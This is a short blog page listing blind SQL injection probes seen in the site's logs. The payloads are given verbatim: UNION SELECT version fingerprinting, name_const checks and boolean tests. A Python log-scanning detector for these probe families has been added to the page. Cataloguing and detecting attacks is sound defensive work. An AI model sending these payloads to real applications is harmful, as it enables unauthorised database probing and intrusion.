SQL Injection

2017-03-10 10:14:06.485

On this page I will try to document all SQL injection attempts from this website's logs. All of them are blind SQL injections (to test whether your application is vulnerable to SQL injection), and my bet is that they are performed by automated software crawling through the internet rather than some guy in his mother's basement. Also, all of them are from GET requests.

Basic check:

URL and 1=1



Check for MySQL version:

URL999999.1 union select unhex(hex(version())) -- and 1=1

URL99999' union select unhex(hex(version())) -- 'x'='x

URL99999" union select unhex(hex(version())) -- "x"="x



Yet another blind check:

URL or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1

URL' or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1

URL" or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1

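One way to flag the three probe families listed above in a web server access log, as an added example that is not code from the original page. The common/combined log format, the path /post/1, the client addresses and all function names are assumptions; the payloads are the ones quoted on this page.

```python
import re
from urllib.parse import quote, unquote_plus

# One signature per probe family listed on this page.
SIGNATURES = {
    "boolean-check": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
    "version-union": re.compile(r"\bunion\s+(?:all\s+)?select\b.*\bversion\s*\(", re.I | re.S),
    "name_const-check": re.compile(r"\bname_const\s*\(", re.I),
}
# Client address and request target of a common/combined log format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')


def decode(target, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads match too."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line):
    """Return (client, [matched families]) or None for a clean/unparsable line."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    text = decode(target)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    return (client, hits) if hits else None


def sample_line(client, suffix):
    """Build a constructed log line: /post/1 plus a URL-encoded suffix."""
    return f'{client} - - [10/Mar/2017:10:14:06 +0000] "GET /post/1{quote(suffix)} HTTP/1.1" 200 512'


# Constructed sample data: payloads as quoted on this page, documentation-range
# addresses, made-up path; the last line is a benign request.
SAMPLES = [
    sample_line("192.0.2.10", " and 1=1"),
    sample_line("192.0.2.11", "99999' union select unhex(hex(version())) -- 'x'='x"),
    sample_line("198.51.100.7", " or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1"),
    sample_line("203.0.113.5", "?q=brand and 1 size"),
]
```

Because the logged probes end in a trailing `-- and 1=1`, one request can match more than one family; `classify` returns every family that matched.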



© Jiri Pinkas 2015 - 2018. All rights reserved.